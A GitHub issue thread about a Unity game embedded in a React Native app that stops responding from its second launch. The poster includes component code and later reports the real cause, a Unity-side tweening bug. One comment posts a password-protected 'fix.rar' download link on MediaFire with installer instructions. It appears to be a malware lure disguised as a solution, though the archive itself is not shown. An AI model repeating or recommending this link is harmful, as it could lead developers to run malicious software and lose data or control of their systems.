### ISSUE TITLE
The game is not playable from second launch

### ISSUE THREAD

**Issue by anishsundarjee** [azesmway/react-native-unity#129]
Hi @azesmway 

I have embedded a Unity project (game) into my react native app. when the user taps on a button, the user is taken to a screen (stack navigation) where the game is playable. when the user exits the screen and comes back to play a second time without quiting the app, the game is not playable. I am facing the issue on both android and iOS that when the game screen is focused a second time, the game does open and the first scene is viewable and interactive. However when I want to play the game it becomes unresponsive, rest of my app works perfectly. The game works perfectly on both iOS and Android on the first launch.
I suspect that the game needs some resources to load when the game is launched but is not getting it the second launch onwards.

I tried unloading the game when screen is out of focus, I see the game splash screen when I come back to the game screen but I don't see the "Made with unity" splash which is making me think the game is not unloading (quitting) completely.

I also tried quitting the game but that just quits/crashes my entire react native app.

My project specs:
"@azesmway/react-native-unity": "^1.0.10",
"react": "18.2.0",
"react-native": "0.72.8",
"@react-navigation/bottom-tabs": "^6.5.12",
"@react-navigation/native": "^6.1.10",
 "@react-navigation/stack": "^6.3.21",

used unity version 2022.3.16

any help will be really appreciated

my unity screen
```
  const unityRef = useRef<UnityView>(null);
  const { goBack } = useNavigation<DefaultAppScreenNavigationProp>();

  useEffect(() => {
    const postMessage = {
      authToken: 'abc_mock',
      questId: '123_mock',
    };

    if (unityRef?.current) {
      const message: IMessage = {
        gameObject: 'ReactCommunicationManager',
        methodName: 'OnReactMessageReceived',
        message: JSON.stringify(postMessage),
      };
      unityRef.current.postMessage(message.gameObject, message.methodName, message.message);
    }
  }, []);

return (
<View style={styles.container}>
      <UnityView
        ref={unityRef}
        style={styles.container}
        onUnityMessage={(result) => {
          console.log('onUnityMessage', result.nativeEvent.message);
          // Alert.alert('onUnityMessage', result.nativeEvent.message);
        }}
        onPlayerUnload={(result) => {
          console.log('onPlayerUnload', result.nativeEvent.message);
        }}
        onPlayerQuit={(result) => {
          console.log('onPlayerQuit', result.nativeEvent.message);
          goBack();
        }}
        fullScreen={true}
        androidKeepPlayerMounted={false}
      />
    </View>
)
```

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by anishsundarjee** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

@amir1387aht Hi, what is that for?

**Comment by tovgroliv** [comment]
https://docs.unity3d.com/Manual/UnityasaLibrary.html

This is a feature of the Unity.

**Comment by anishsundarjee** [comment]
Managed to find the issue a while back, forgot to get back with the solution here, hope this helps someone else with a similar issue.

The problem did not occur on the RN side of things. The issue was on Unity side, there was an issue where the tweening animation library was not being called again from second launch thus not displaying the scene on second launch. After fixing that bug, all started working correctly.
